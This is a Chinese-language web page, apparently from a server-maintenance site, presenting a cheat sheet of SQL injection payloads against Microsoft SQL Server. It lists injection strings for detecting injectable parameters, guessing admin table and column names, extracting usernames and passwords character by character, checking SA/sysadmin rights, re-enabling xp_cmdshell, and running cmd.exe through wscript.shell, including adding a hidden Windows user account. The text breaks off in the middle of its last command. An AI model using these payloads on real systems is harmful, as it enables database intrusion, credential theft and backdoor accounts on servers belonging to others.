常用的SQL 注射语句解析_SQL SERVER数据库_黑客防线网安服务器维护基地--Powered by WWW.RONGSEN.COM.CN

常用的SQL 注射语句解析

作者:黑客防线网安SQL维护基地 来源:黑客防线网安SQL维护基地 浏览次数:0

本篇关键词:解析语句注射常用
黑客防线网安网讯:    SQL注射语句  1.判断有无注入点  ' ; and 1=1 and 1=2  2.猜表一般的表的名称无非是admin adminuser user pass password 等..  and 0<>(select count(*) from *)  and 0...
    SQL注射语句
  1.判断有无注入点
  ' ; and 1=1 and 1=2
  2.猜表一般的表的名称无非是admin adminuser user pass password 等..
  and 0<>(select count(*) from *)
  and 0<>(select count(*) from admin) ---判断是否存在admin这张表
  3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个
  and 0<(select count(*) from admin)
  and 1<(select count(*) from admin)
  4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称
  and 1=(select count(*) from admin where len(*)>0)--
  and 1=(select count(*) from admin where len(用户字段名称name)>0)
  and 1=(select count(*) from admin where len(密码字段名称password)>0)
  5.猜解各个字段的长度 猜解长度就是把>0变换 直到返回正确页面为止
  and 1=(select count(*) from admin where len(*)>0)
  and 1=(select count(*) from admin where len(name)>6) 错误
  and 1=(select count(*) from admin where len(name)>5) 正确 长度是6
  and 1=(select count(*) from admin where len(name)=6) 正确
  and 1=(select count(*) from admin where len(password)>11) 正确
  and 1=(select count(*) from admin where len(password)>12) 错误 长度是12
  and 1=(select count(*) from admin where len(password)=12) 正确
  6.猜解字符
  and 1=(select count(*) from admin where left(name,1)='a') ---猜解用户帐号的第一位
  and 1=(select count(*) from admin where left(name,2)='ab')---猜解用户帐号的第二位
  就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了
  and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) --
  这个查询语句可以猜解中文的用户和密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符.
  看服务器打的补丁=出错了打了SP4补丁
  and 1=(select @@VERSION)--
  看数据库连接账号的权限返回正常证明是服务器角色sysadmin权限
  and 1=(Select IS_SRVROLEMEMBER('sysadmin'))--
  判断连接数据库帐号。(采用SA账号连接 返回正常=证明了连接账号是SA)
  and 'sa'=(Select System_user)--
  and user_name()='dbo'--
  and 0<>(select user_name()--
  看xp_cmdshell是否删除
  and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND
  name = 'xp_cmdshell')--
  xp_cmdshell被删除,恢复,支持绝对路径的恢复
  ;EXEC master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'--
  ;EXEC master.dbo.sp_addextendedproc
  'xp_cmdshell','c:inetpubwwwrootxplog70.dll'--
  反向PING自己实验
  ;use master;declare @s int;exec sp_oacreate "wscript.shell",@s out;exec
  sp_oamethod @s,"run",NULL,"cmd.exe /c ping 192.168.0.1";--
  加帐号
  ;DECLARE @shell INT EXEC SP_OACreate 'wscript.shell',@shell OUTPUT EXEC
  SP_OAMETHOD @shell,'run',null, 'C:WINNTsystem32cmd.exe /c net user
  jiaoniang$ 1866574 /add'--
  创建一个虚拟目录E盘:
  ;declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod
  @o, 'run', NULL,' cscript.exe c:inetpubwwwrootmkwebdir.vbs -
    黑客防线网安服务器维护方案本篇连接:http://www.rongsen.com.cn/show-11418-1.html
网站维护教程更新时间:2012-03-21 03:21:23  【打印此页】  【关闭
我要申请本站N点 | 黑客防线官网 |  
专业服务器维护及网站维护手工安全搭建环境,网站安全加固服务。黑客防线网安服务器维护基地招商进行中!QQ:29769479

footer  footer  footer  footer